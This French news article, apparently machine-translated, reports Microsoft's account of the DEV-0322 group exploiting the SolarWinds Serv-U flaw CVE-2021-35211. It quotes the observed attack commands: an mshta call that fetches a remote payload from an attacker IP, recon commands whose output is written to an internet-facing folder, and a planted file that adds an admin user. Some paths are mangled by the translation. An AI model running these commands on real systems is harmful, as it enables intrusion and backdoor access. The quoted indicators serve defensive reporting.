Les pirates chinois « DEV 0322 » exploitent la faille du serv-U de SolarWinds : Microsoft

  • FrançaisFrançais



  • Les tristement célèbres attaques de SolarWinds ont laissé un grave impact sur le paysage de la cybersécurité. Alors que les organisations se remettent encore de ses conséquences, Microsoft a récemment mis en garde contre un groupe d’acteurs chinois, suivi comme DEV-0322, exploiter une faille dans le logiciel FTP de SolarWinds Serv-U.

    La vulnérabilité d’évasion de la mémoire à distance CVE-2021-35211, qui est maintenant corrigé, a été trouvé dans l’implémentation par Serv-U du protocole Secure Shell (SSH). La faille aurait pu permettre à un attaquant distant d’exécuter un code arbitraire avec des privilèges d’accès, lui permettant d’effectuer des actions non autorisées comme le déploiement de logiciels malveillants ou la modification d’informations. Le géant de la technologie a affirmé que le groupe DEV-0322 ciblait le secteur de la défense et les organisations informatiques aux États-Unis. Le groupe de menaces a été découvert en train d’exploiter des services VPN commerciaux et de compromettre des routeurs Wi-Fi tout en attaquant les cibles.

    Microsoft a observé un comportement d’attaque zero-day et a trouvé un processus malveillant résultant du processus Serv-U.exe :

    • C:WindowsSystem32mshta.exe http://144[.]34[.]179[.]162/a (défangé)
    • exe /c whoami > “./Client/Common/redacted.txt”
    • exe /c dir > “.ClientCommonredacted.txt”
    • exe /c “”C:WindowsTempServ-U.bat””
    • exe C:WindowsTempServ-U.bat
    • exe /c tapez \redactedredacted.Archive > “C:ProgramDataRhinoSoftServ-UUsersGlobal Usersredacted.Archive”

    « Nous avons observé que DEV-0322 acheminait la sortie de ses commandes cmd.exe vers des fichiers du dossier Serv-U ClientCommon, accessible par défaut depuis Internet afin que les attaquants puissent récupérer les résultats des commandes. L’acteur a également été trouvé en train d’ajouter un nouvel utilisateur global à Serv-U, s’ajoutant effectivement en tant qu’administrateur Serv-U, en créant manuellement un fichier .Archive spécialement conçu dans le répertoire des utilisateurs globaux. Les informations sur les utilisateurs de Serv-U sont stockées dans ces fichiers .Archive », a déclaré Microsoft. « En raison de la façon dont DEV-0322 a écrit son code lorsque l’exploit compromet avec succès le processus Serv-U, une exception est générée et enregistrée dans un fichier journal Serv-U, DebugSocketLog.txt. Le processus pourrait également se bloquer après l’exécution d’une commande malveillante.

    Bien que la cause première de la vulnérabilité soit inconnue, Microsoft a exhorté les organisations et les utilisateurs à mettre immédiatement à jour leurs instances de Serv-U avec la dernière version.

    Les pirates de SolarWinds frappent à nouveau !

    Les attaques de la chaîne d’approvisionnement de SolarWinds ont ciblé plusieurs agences gouvernementales américaines et compromis les réseaux de près de 18 000 organisations publiques et privées dans le monde. Le mois dernier, Microsoft a révélé que Nobelium, le groupe cybercriminel basé en Russie à l’origine des piratages de SolarWinds, ciblait désormais les agences gouvernementales, les groupes de réflexion, les consultants et les organisations non gouvernementales du monde entier. Lire la suite Ici

    Source

    L'équipe de Comparaland

    Rédacteur web depuis 2009 et webmestre depuis 2011.

    Je m'intéresse à tous les sujets comme la politique, la culture, la géopolitique, l'économie ou la technologie. Toute information permettant d'éclairer mon esprit et donc, le vôtre, dans un monde obscur et à la dérive. Je suis l'auteur de plusieurs livre

    Pour me contacter personnellement :

    Laisser un commentaire

    Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *